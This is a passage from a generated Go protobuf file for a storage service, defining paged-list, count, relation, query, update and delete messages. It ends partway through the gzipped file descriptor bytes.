XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Paged) Reset() { *m = Paged{} } func (m *Paged) String() string { return proto.CompactTextString(m) } func (*Paged) ProtoMessage() {} func (*Paged) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{13} } func (m *Paged) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Paged.Unmarshal(m, b) } func (m *Paged) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Paged.Marshal(b, m, deterministic) } func (m *Paged) XXX_Merge(src proto.Message) { xxx_messageInfo_Paged.Merge(m, src) } func (m *Paged) XXX_Size() int { return xxx_messageInfo_Paged.Size(m) } func (m *Paged) XXX_DiscardUnknown() { xxx_messageInfo_Paged.DiscardUnknown(m) } var xxx_messageInfo_Paged proto.InternalMessageInfo func (m *Paged) GetList() []*E { if m != nil { return m.List } return nil } func (m *Paged) GetHasMore() bool { if m != nil { return m.HasMore } return false } func (m *Paged) GetNextFrom() string { if m != nil { return m.NextFrom } return "" } type PagedIDs struct { List []string `protobuf:"bytes,1,rep,name=List,proto3" json:"List,omitempty"` HasMore bool `protobuf:"varint,2,opt,name=HasMore,proto3" json:"HasMore,omitempty"` NextFrom string `protobuf:"bytes,3,opt,name=NextFrom,proto3" json:"NextFrom,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *PagedIDs) Reset() { *m = PagedIDs{} } func (m *PagedIDs) String() string { return proto.CompactTextString(m) } func (*PagedIDs) ProtoMessage() {} func (*PagedIDs) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{14} } func (m *PagedIDs) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_PagedIDs.Unmarshal(m, b) } func (m *PagedIDs) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_PagedIDs.Marshal(b, m, deterministic) } func (m *PagedIDs) XXX_Merge(src proto.Message) { xxx_messageInfo_PagedIDs.Merge(m, src) } func (m *PagedIDs) XXX_Size() int { return xxx_messageInfo_PagedIDs.Size(m) } func (m *PagedIDs) XXX_DiscardUnknown() { xxx_messageInfo_PagedIDs.DiscardUnknown(m) } var xxx_messageInfo_PagedIDs proto.InternalMessageInfo func (m *PagedIDs) GetList() []string { if m != nil { return m.List } return nil } func (m *PagedIDs) GetHasMore() bool { if m != nil { return m.HasMore } return false } func (m *PagedIDs) GetNextFrom() string { if m != nil { return m.NextFrom } return "" } type CountByState struct { Counts map[string]int64 `protobuf:"bytes,1,rep,name=counts,proto3" json:"counts,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"varint,2,opt,name=value,proto3"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *CountByState) Reset() { *m = CountByState{} } func (m *CountByState) String() string { return proto.CompactTextString(m) } func (*CountByState) ProtoMessage() {} func (*CountByState) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{15} } func (m *CountByState) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_CountByState.Unmarshal(m, b) } func (m *CountByState) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_CountByState.Marshal(b, m, deterministic) } func (m *CountByState) XXX_Merge(src proto.Message) { xxx_messageInfo_CountByState.Merge(m, src) } func (m *CountByState) XXX_Size() int { return xxx_messageInfo_CountByState.Size(m) } func (m *CountByState) XXX_DiscardUnknown() { xxx_messageInfo_CountByState.DiscardUnknown(m) } var xxx_messageInfo_CountByState proto.InternalMessageInfo func (m *CountByState) GetCounts() map[string]int64 { if m != nil { return m.Counts } return nil } type Counts struct { Counts map[string]*CountByState `protobuf:"bytes,1,rep,name=counts,proto3" json:"counts,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Counts) Reset() { *m = Counts{} } func (m *Counts) String() string { return proto.CompactTextString(m) } func (*Counts) ProtoMessage() {} func (*Counts) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{16} } func (m *Counts) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Counts.Unmarshal(m, b) } func (m *Counts) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Counts.Marshal(b, m, deterministic) } func (m *Counts) XXX_Merge(src proto.Message) { xxx_messageInfo_Counts.Merge(m, src) } func (m *Counts) XXX_Size() int { return xxx_messageInfo_Counts.Size(m) } func (m *Counts) XXX_DiscardUnknown() { xxx_messageInfo_Counts.DiscardUnknown(m) } var xxx_messageInfo_Counts proto.InternalMessageInfo func (m *Counts) GetCounts() map[string]*CountByState { if m != nil { return m.Counts } return nil } type HasRelationsReq struct { From *E `protobuf:"bytes,1,opt,name=from,proto3" json:"from,omitempty"` To *E `protobuf:"bytes,2,opt,name=to,proto3" json:"to,omitempty"` Relations []string `protobuf:"bytes,3,rep,name=relations,proto3" json:"relations,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *HasRelationsReq) Reset() { *m = HasRelationsReq{} } func (m *HasRelationsReq) String() string { return proto.CompactTextString(m) } func (*HasRelationsReq) ProtoMessage() {} func (*HasRelationsReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{17} } func (m *HasRelationsReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_HasRelationsReq.Unmarshal(m, b) } func (m *HasRelationsReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_HasRelationsReq.Marshal(b, m, deterministic) } func (m *HasRelationsReq) XXX_Merge(src proto.Message) { xxx_messageInfo_HasRelationsReq.Merge(m, src) } func (m *HasRelationsReq) XXX_Size() int { return xxx_messageInfo_HasRelationsReq.Size(m) } func (m *HasRelationsReq) XXX_DiscardUnknown() { xxx_messageInfo_HasRelationsReq.DiscardUnknown(m) } var xxx_messageInfo_HasRelationsReq proto.InternalMessageInfo func (m *HasRelationsReq) GetFrom() *E { if m != nil { return m.From } return nil } func (m *HasRelationsReq) GetTo() *E { if m != nil { return m.To } return nil } func (m *HasRelationsReq) GetRelations() []string { if m != nil { return m.Relations } return nil } type HasRelations struct { Relations map[string]bool `protobuf:"bytes,1,rep,name=relations,proto3" json:"relations,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"varint,2,opt,name=value,proto3"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *HasRelations) Reset() { *m = HasRelations{} } func (m *HasRelations) String() string { return proto.CompactTextString(m) } func (*HasRelations) ProtoMessage() {} func (*HasRelations) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{18} } func (m *HasRelations) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_HasRelations.Unmarshal(m, b) } func (m *HasRelations) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_HasRelations.Marshal(b, m, deterministic) } func (m *HasRelations) XXX_Merge(src proto.Message) { xxx_messageInfo_HasRelations.Merge(m, src) } func (m *HasRelations) XXX_Size() int { return xxx_messageInfo_HasRelations.Size(m) } func (m *HasRelations) XXX_DiscardUnknown() { xxx_messageInfo_HasRelations.DiscardUnknown(m) } var xxx_messageInfo_HasRelations proto.InternalMessageInfo func (m *HasRelations) GetRelations() map[string]bool { if m != nil { return m.Relations } return nil } type EX struct { Entity *E `protobuf:"bytes,1,opt,name=entity,proto3" json:"entity,omitempty"` Related []*EX `protobuf:"bytes,2,rep,name=related,proto3" json:"related,omitempty"` Resources []*E `protobuf:"bytes,3,rep,name=resources,proto3" json:"resources,omitempty"` Counts *Counts `protobuf:"bytes,4,opt,name=counts,proto3" json:"counts,omitempty"` HasRelations *HasRelations `protobuf:"bytes,5,opt,name=hasRelations,proto3" json:"hasRelations,omitempty"` Children map[string]*EXPaged `protobuf:"bytes,6,rep,name=children,proto3" json:"children,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *EX) Reset() { *m = EX{} } func (m *EX) String() string { return proto.CompactTextString(m) } func (*EX) ProtoMessage() {} func (*EX) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{19} } func (m *EX) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_EX.Unmarshal(m, b) } func (m *EX) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_EX.Marshal(b, m, deterministic) } func (m *EX) XXX_Merge(src proto.Message) { xxx_messageInfo_EX.Merge(m, src) } func (m *EX) XXX_Size() int { return xxx_messageInfo_EX.Size(m) } func (m *EX) XXX_DiscardUnknown() { xxx_messageInfo_EX.DiscardUnknown(m) } var xxx_messageInfo_EX proto.InternalMessageInfo func (m *EX) GetEntity() *E { if m != nil { return m.Entity } return nil } func (m *EX) GetRelated() []*EX { if m != nil { return m.Related } return nil } func (m *EX) GetResources() []*E { if m != nil { return m.Resources } return nil } func (m *EX) GetCounts() *Counts { if m != nil { return m.Counts } return nil } func (m *EX) GetHasRelations() *HasRelations { if m != nil { return m.HasRelations } return nil } func (m *EX) GetChildren() map[string]*EXPaged { if m != nil { return m.Children } return nil } type EXPaged struct { List []*EX `protobuf:"bytes,1,rep,name=List,proto3" json:"List,omitempty"` HasMore bool `protobuf:"varint,2,opt,name=HasMore,proto3" json:"HasMore,omitempty"` NextFrom string `protobuf:"bytes,3,opt,name=NextFrom,proto3" json:"NextFrom,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *EXPaged) Reset() { *m = EXPaged{} } func (m *EXPaged) String() string { return proto.CompactTextString(m) } func (*EXPaged) ProtoMessage() {} func (*EXPaged) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{20} } func (m *EXPaged) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_EXPaged.Unmarshal(m, b) } func (m *EXPaged) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_EXPaged.Marshal(b, m, deterministic) } func (m *EXPaged) XXX_Merge(src proto.Message) { xxx_messageInfo_EXPaged.Merge(m, src) } func (m *EXPaged) XXX_Size() int { return xxx_messageInfo_EXPaged.Size(m) } func (m *EXPaged) XXX_DiscardUnknown() { xxx_messageInfo_EXPaged.DiscardUnknown(m) } var xxx_messageInfo_EXPaged proto.InternalMessageInfo func (m *EXPaged) GetList() []*EX { if m != nil { return m.List } return nil } func (m *EXPaged) GetHasMore() bool { if m != nil { return m.HasMore } return false } func (m *EXPaged) GetNextFrom() string { if m != nil { return m.NextFrom } return "" } type EXList struct { List []*EX `protobuf:"bytes,1,rep,name=List,proto3" json:"List,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *EXList) Reset() { *m = EXList{} } func (m *EXList) String() string { return proto.CompactTextString(m) } func (*EXList) ProtoMessage() {} func (*EXList) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{21} } func (m *EXList) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_EXList.Unmarshal(m, b) } func (m *EXList) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_EXList.Marshal(b, m, deterministic) } func (m *EXList) XXX_Merge(src proto.Message) { xxx_messageInfo_EXList.Merge(m, src) } func (m *EXList) XXX_Size() int { return xxx_messageInfo_EXList.Size(m) } func (m *EXList) XXX_DiscardUnknown() { xxx_messageInfo_EXList.DiscardUnknown(m) } var xxx_messageInfo_EXList proto.InternalMessageInfo func (m *EXList) GetList() []*EX { if m != nil { return m.List } return nil } type GetByQueryReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Queries []*Query `protobuf:"bytes,2,rep,name=queries,proto3" json:"queries,omitempty"` Sorts map[string]SortDir `protobuf:"bytes,3,rep,name=sorts,proto3" json:"sorts,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"varint,2,opt,name=value,proto3,enum=def.SortDir"` Limit *Limit `protobuf:"bytes,4,opt,name=limit,proto3" json:"limit,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *GetByQueryReq) Reset() { *m = GetByQueryReq{} } func (m *GetByQueryReq) String() string { return proto.CompactTextString(m) } func (*GetByQueryReq) ProtoMessage() {} func (*GetByQueryReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{22} } func (m *GetByQueryReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_GetByQueryReq.Unmarshal(m, b) } func (m *GetByQueryReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_GetByQueryReq.Marshal(b, m, deterministic) } func (m *GetByQueryReq) XXX_Merge(src proto.Message) { xxx_messageInfo_GetByQueryReq.Merge(m, src) } func (m *GetByQueryReq) XXX_Size() int { return xxx_messageInfo_GetByQueryReq.Size(m) } func (m *GetByQueryReq) XXX_DiscardUnknown() { xxx_messageInfo_GetByQueryReq.DiscardUnknown(m) } var xxx_messageInfo_GetByQueryReq proto.InternalMessageInfo func (m *GetByQueryReq) GetType() string { if m != nil { return m.Type } return "" } func (m *GetByQueryReq) GetQueries() []*Query { if m != nil { return m.Queries } return nil } func (m *GetByQueryReq) GetSorts() map[string]SortDir { if m != nil { return m.Sorts } return nil } func (m *GetByQueryReq) GetLimit() *Limit { if m != nil { return m.Limit } return nil } type UpdateContentReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Id string `protobuf:"bytes,2,opt,name=id,proto3" json:"id,omitempty"` Updates []*Update `protobuf:"bytes,3,rep,name=updates,proto3" json:"updates,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *UpdateContentReq) Reset() { *m = UpdateContentReq{} } func (m *UpdateContentReq) String() string { return proto.CompactTextString(m) } func (*UpdateContentReq) ProtoMessage() {} func (*UpdateContentReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{23} } func (m *UpdateContentReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_UpdateContentReq.Unmarshal(m, b) } func (m *UpdateContentReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_UpdateContentReq.Marshal(b, m, deterministic) } func (m *UpdateContentReq) XXX_Merge(src proto.Message) { xxx_messageInfo_UpdateContentReq.Merge(m, src) } func (m *UpdateContentReq) XXX_Size() int { return xxx_messageInfo_UpdateContentReq.Size(m) } func (m *UpdateContentReq) XXX_DiscardUnknown() { xxx_messageInfo_UpdateContentReq.DiscardUnknown(m) } var xxx_messageInfo_UpdateContentReq proto.InternalMessageInfo func (m *UpdateContentReq) GetType() string { if m != nil { return m.Type } return "" } func (m *UpdateContentReq) GetId() string { if m != nil { return m.Id } return "" } func (m *UpdateContentReq) GetUpdates() []*Update { if m != nil { return m.Updates } return nil } type SetStateReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Ids []string `protobuf:"bytes,2,rep,name=ids,proto3" json:"ids,omitempty"` State State `protobuf:"varint,3,opt,name=state,proto3,enum=def.State" json:"state,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *SetStateReq) Reset() { *m = SetStateReq{} } func (m *SetStateReq) String() string { return proto.CompactTextString(m) } func (*SetStateReq) ProtoMessage() {} func (*SetStateReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{24} } func (m *SetStateReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_SetStateReq.Unmarshal(m, b) } func (m *SetStateReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_SetStateReq.Marshal(b, m, deterministic) } func (m *SetStateReq) XXX_Merge(src proto.Message) { xxx_messageInfo_SetStateReq.Merge(m, src) } func (m *SetStateReq) XXX_Size() int { return xxx_messageInfo_SetStateReq.Size(m) } func (m *SetStateReq) XXX_DiscardUnknown() { xxx_messageInfo_SetStateReq.DiscardUnknown(m) } var xxx_messageInfo_SetStateReq proto.InternalMessageInfo func (m *SetStateReq) GetType() string { if m != nil { return m.Type } return "" } func (m *SetStateReq) GetIds() []string { if m != nil { return m.Ids } return nil } func (m *SetStateReq) GetState() State { if m != nil { return m.State } return State_StateDeleted } type DeleteReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Ids []string `protobuf:"bytes,2,rep,name=ids,proto3" json:"ids,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *DeleteReq) Reset() { *m = DeleteReq{} } func (m *DeleteReq) String() string { return proto.CompactTextString(m) } func (*DeleteReq) ProtoMessage() {} func (*DeleteReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{25} } func (m *DeleteReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_DeleteReq.Unmarshal(m, b) } func (m *DeleteReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_DeleteReq.Marshal(b, m, deterministic) } func (m *DeleteReq) XXX_Merge(src proto.Message) { xxx_messageInfo_DeleteReq.Merge(m, src) } func (m *DeleteReq) XXX_Size() int { return xxx_messageInfo_DeleteReq.Size(m) } func (m *DeleteReq) XXX_DiscardUnknown() { xxx_messageInfo_DeleteReq.DiscardUnknown(m) } var xxx_messageInfo_DeleteReq proto.InternalMessageInfo func (m *DeleteReq) GetType() string { if m != nil { return m.Type } return "" } func (m *DeleteReq) GetIds() []string { if m != nil { return m.Ids } return nil } type GetCountsReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Id string `protobuf:"bytes,2,opt,name=id,proto3" json:"id,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *GetCountsReq) Reset() { *m = GetCountsReq{} } func (m *GetCountsReq) String() string { return proto.CompactTextString(m) } func (*GetCountsReq) ProtoMessage() {} func (*GetCountsReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{26} } func (m *GetCountsReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_GetCountsReq.Unmarshal(m, b) } func (m *GetCountsReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_GetCountsReq.Marshal(b, m, deterministic) } func (m *GetCountsReq) XXX_Merge(src proto.Message) { xxx_messageInfo_GetCountsReq.Merge(m, src) } func (m *GetCountsReq) XXX_Size() int { return xxx_messageInfo_GetCountsReq.Size(m) } func (m *GetCountsReq) XXX_DiscardUnknown() { xxx_messageInfo_GetCountsReq.DiscardUnknown(m) } var xxx_messageInfo_GetCountsReq proto.InternalMessageInfo func (m *GetCountsReq) GetType() string { if m != nil { return m.Type } return "" } func (m *GetCountsReq) GetId() string { if m != nil { return m.Id } return "" } func init() { proto.RegisterEnum("def.CountType", CountType_name, CountType_value) proto.RegisterEnum("def.State", State_name, State_value) proto.RegisterEnum("def.Op", Op_name, Op_value) proto.RegisterEnum("def.UpdateAction", UpdateAction_name, UpdateAction_value) proto.RegisterEnum("def.ValueType", ValueType_name, ValueType_value) proto.RegisterEnum("def.SortDir", SortDir_name, SortDir_value) proto.RegisterType((*RType)(nil), "def.RType") proto.RegisterType((*EType)(nil), "def.EType") proto.RegisterType((*E)(nil), "def.E") proto.RegisterMapType((map[string]string)(nil), "def.E.ContentEntry") proto.RegisterMapType((map[string]string)(nil), "def.E.MetaEntry") proto.RegisterType((*DefineETypeReq)(nil), "def.DefineETypeReq") proto.RegisterType((*CreateEWithRsReq)(nil), "def.CreateEWithRsReq") proto.RegisterType((*RelationReq)(nil), "def.RelationReq") proto.RegisterType((*GetByIDsReq)(nil), "def.GetByIDsReq") proto.RegisterType((*EList)(nil), "def.EList") proto.RegisterType((*Empty)(nil), "def.Empty") proto.RegisterType((*HasRelationResp)(nil), "def.HasRelationResp") proto.RegisterType((*Query)(nil), "def.Query") proto.RegisterType((*Limit)(nil), "def.Limit") proto.RegisterType((*Update)(nil), "def.Update") proto.RegisterType((*Paged)(nil), "def.Paged") proto.RegisterType((*PagedIDs)(nil), "def.PagedIDs") proto.RegisterType((*CountByState)(nil), "def.CountByState") proto.RegisterMapType((map[string]int64)(nil), "def.CountByState.CountsEntry") proto.RegisterType((*Counts)(nil), "def.Counts") proto.RegisterMapType((map[string]*CountByState)(nil), "def.Counts.CountsEntry") proto.RegisterType((*HasRelationsReq)(nil), "def.HasRelationsReq") proto.RegisterType((*HasRelations)(nil), "def.HasRelations") proto.RegisterMapType((map[string]bool)(nil), "def.HasRelations.RelationsEntry") proto.RegisterType((*EX)(nil), "def.EX") proto.RegisterMapType((map[string]*EXPaged)(nil), "def.EX.ChildrenEntry") proto.RegisterType((*EXPaged)(nil), "def.EXPaged") proto.RegisterType((*EXList)(nil), "def.EXList") proto.RegisterType((*GetByQueryReq)(nil), "def.GetByQueryReq") proto.RegisterMapType((map[string]SortDir)(nil), "def.GetByQueryReq.SortsEntry") proto.RegisterType((*UpdateContentReq)(nil), "def.UpdateContentReq") proto.RegisterType((*SetStateReq)(nil), "def.SetStateReq") proto.RegisterType((*DeleteReq)(nil), "def.DeleteReq") proto.RegisterType((*GetCountsReq)(nil), "def.GetCountsReq") } func init() { proto.RegisterFile("storage.proto", fileDescriptor_0d2c4ccf1453ffdb) } var fileDescriptor_0d2c4ccf1453ffdb = []byte{ // 1660 bytes of a gzipped FileDescriptorProto 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xb4, 0x58, 0xcd, 0x72, 0xdb, 0x46, 0x12, 0x16, 0x00, 0x02, 0x24, 0x9b, 0x12, 0x0d, 0xcf, 0xfa, 0x07, 0xe6, 0x7a, 0xbd, 0x5c, 0x58, 0x2e, 0x73, 0xb5, 0x16, 0xb5, 0xa2, 0xfc, 0x13, 0x3b, 0xae, 0x54, 0x59, 0x22, 0x65, 0x33, 0x91, 0x7f, 0x02, 0xc9, 0x89, 0x53, 0x89, 0x53, 0x05, 0x11, 0x23, 0x0a, 0x15, 0x12, 0xa0, 0x80, 0xa1, 0xca, 0x4c, 0x2a, 0x55, 0xb9, 0xa4, 0xe2, 0x43, 0x4e, 0x39, 0xe5, 0x1d, 0xf2, 0x06, 0x39, 0xe5, 0x96, 0x67, 0xf1, 0x03, 0xe4, 0x9e, 0x9a, 0x9e, 0x01, 0x08, 0x48, 0xae, 0x48, 0x96, 0x9d, 0x8b, 0x38, 0xd3, 0xdd, 0x33, 0xfd, 0x87, 0xfe, 0x7a, 0x5a, 0x30, 0x17, 0xb3, 0x30, 0x72, 0xfb, 0xb4, 0x39, 0x8a, 0x42, 0x16, 0x12, 0xcd, 0xa3, 0x3b, 0xb5, 0x7b, 0x7d, 0x9f, 0xed, 0x8e, 0xb7, 0x9b, 0xbd, 0x70, 0xb8, 0x44, 0x83, 0xfd, 0x70, 0x32, 0x8a, 0xc2, 0x17, 0x93, 0x25, 0x94, 0xe8, 0x2d, 0xf6, 0x69, 0xb0, 0xb8, 0xef, 0x0e, 0x7c, 0xcf, 0x65, 0x74, 0xe9, 0xd0, 0x42, 0xdc, 0x63, 0xbf, 0x52, 0x40, 0x77, 0xb6, 0x26, 0x23, 0x4a, 0x5a, 0x50, 0xd8, 0x89, 0xc2, 0xa1, 0xa5, 0xd4, 0x95, 0x46, 0x79, 0xf5, 0xd2, 0xaf, 0xaf, 0x7e, 0xd3, 0x2e, 0x44, 0xe7, 0x5b, 0x67, 0xbf, 0xfc, 0xdc, 0x5d, 0xfc, 0xfa, 0x39, 0xff, 0xf3, 0xff, 0xc5, 0xdb, 0xcf, 0xbf, 0x59, 0xbe, 0xb6, 0x7c, 0xfd, 0xdb, 0x79, 0x07, 0x65, 0x49, 0x13, 0x54, 0x16, 0x5a, 0xea, 0xb1, 0x4e, 0xa8, 0x2c, 0xe4, 0x3a, 0xf6, 0x69, 0xb4, 0x6d, 0x69, 0xc7, 0xd3, 0xc1, 0x65, 0x49, 0x0d, 0x4a, 0xc3, 0xf1, 0x80, 0xf9, 0xa3, 0x01, 0xb5, 0x0a, 0x75, 0xa5, 0x51, 0x72, 0xd2, 0x3d, 0xb9, 0x06, 0xe5, 0x5e, 0x38, 0x0e, 0x18, 0x77, 0xc0, 0xd2, 0xeb, 0x4a, 0xa3, 0xda, 0xaa, 0x36, 0x3d, 0xba, 0xd3, 0x5c, 0x4b, 0xa8, 0xce, 0x54, 0xc0, 0x7e, 0x1f, 0xf4, 0x4e, 0xe2, 0x6a, 0xe0, 0x0e, 0xe9, 0x71, 0x5d, 0xe5, 0xb2, 0xf6, 0x1f, 0x1a, 0x28, 0x1d, 0x7e, 0x12, 0x75, 0x1d, 0xf3, 0x24, 0x6a, 0xab, 0x82, 0xda, 0x6d, 0x8b, 0x20, 0x39, 0x6a, 0xb7, 0x4d, 0x4c, 0xd0, 0xba, 0xed, 0x65, 0x11, 0x03, 0x87, 0x2f, 0x05, 0xa5, 0x85, 0xde, 0x21, 0xa5, 0x25, 0x28, 0x2b, 0xe8, 0x12, 0x52, 0x56, 0xc8, 0x19, 0xd0, 0xd7, 0xb6, 0xfc, 0x21, 0xb5, 0x8c, 0xba, 0xd2, 0xd0, 0x1c, 0xb1, 0xe1, 0xd4, 0xa7, 0x48, 0x2d, 0x0a, 0x2a, 0x6e, 0x48, 0x1d, 0xf4, 0x4d, 0xe6, 0x32, 0x6a, 0x95, 0x30, 0x24, 0x80, 0x21, 0x41, 0x8a, 0x23, 0x18, 0x84, 0x40, 0x61, 0xcb, 0xed, 0xc7, 0x56, 0xb9, 0xae, 0x35, 0xca, 0x0e, 0xae, 0xc9, 0x3c, 0x14, 0x1e, 0x52, 0xe6, 0x5a, 0x50, 0xd7, 0x1a, 0x95, 0x96, 0x89, 0x87, 0x3a, 0x4d, 0x4e, 0xea, 0x04, 0x2c, 0x9a, 0x38, 0xc8, 0x25, 0x8b, 0x50, 0x5c, 0x0b, 0x03, 0x46, 0x03, 0x66, 0x55, 0x50, 0xf0, 0x1f, 0x52, 0x50, 0x52, 0x85, 0x6c, 0x22, 0xc3, 0x0d, 0xdc, 0xec, 0x85, 0x11, 0xb5, 0x66, 0x85, 0x81, 0xb8, 0x21, 0xe7, 0xc0, 0xc0, 0xc5, 0xb2, 0x35, 0x87, 0x64, 0xb9, 0x23, 0x17, 0xa1, 0xec, 0xd0, 0x38, 0x1c, 0x47, 0x3d, 0x1a, 0x5b, 0x55, 0xb4, 0x6d, 0x4a, 0xa8, 0xdd, 0x82, 0x72, 0x6a, 0x0d, 0x8f, 0xd0, 0x57, 0x74, 0x22, 0x12, 0xe1, 0xf0, 0x25, 0x57, 0xb5, 0xef, 0x0e, 0xc6, 0x54, 0x86, 0x5a, 0x6c, 0xee, 0xa8, 0xef, 0x29, 0xb5, 0x3b, 0x30, 0x9b, 0xb5, 0xee, 0x4d, 0xce, 0xda, 0x3b, 0x50, 0x6d, 0xd3, 0x1d, 0x3f, 0xa0, 0xf8, 0xe9, 0x38, 0x74, 0x8f, 0x47, 0x97, 0xa6, 0x1f, 0x41, 0x45, 0x46, 0x57, 0x70, 0x05, 0x83, 0xb4, 0xa0, 0xda, 0x8b, 0xa8, 0xcb, 0xfc, 0x30, 0xc0, 0xda, 0x8a, 0x2d, 0x15, 0x43, 0x25, 0x44, 0x91, 0xe4, 0x1c, 0x90, 0xb0, 0x3f, 0x04, 0x73, 0x8d, 0x53, 0x68, 0xe7, 0x53, 0x9f, 0xed, 0x3a, 0x31, 0xd7, 0x74, 0x06, 0x94, 0x44, 0x8b, 0x21, 0xb4, 0x38, 0x0a, 0xcf, 0x6e, 0x31, 0xa2, 0x03, 0x97, 0x51, 0x4f, 0x5e, 0x9b, 0xf0, 0x12, 0xb2, 0x3d, 0x86, 0x8a, 0xc3, 0x97, 0xfc, 0x76, 0xba, 0x47, 0x6a, 0x99, 0xca, 0x9e, 0x4a, 0x8b, 0x0a, 0x3e, 0x97, 0x56, 0xf0, 0x94, 0x73, 0xc2, 0x4a, 0xb5, 0x37, 0xa1, 0x72, 0x9f, 0xb2, 0xd5, 0x49, 0xb7, 0x8d, 0xd6, 0xb7, 0xa0, 0xc0, 0xde, 0xa0, 0x56, 0xb8, 0x2c, 0xcf, 0x8c, 0xef, 0x89, 0x70, 0x95, 0x1d, 0xbe, 0xb4, 0x2f, 0x83, 0xde, 0xd9, 0xf0, 0x63, 0xc6, 0xbd, 0x18, 0xf8, 0x31, 0xb3, 0x94, 0x9c, 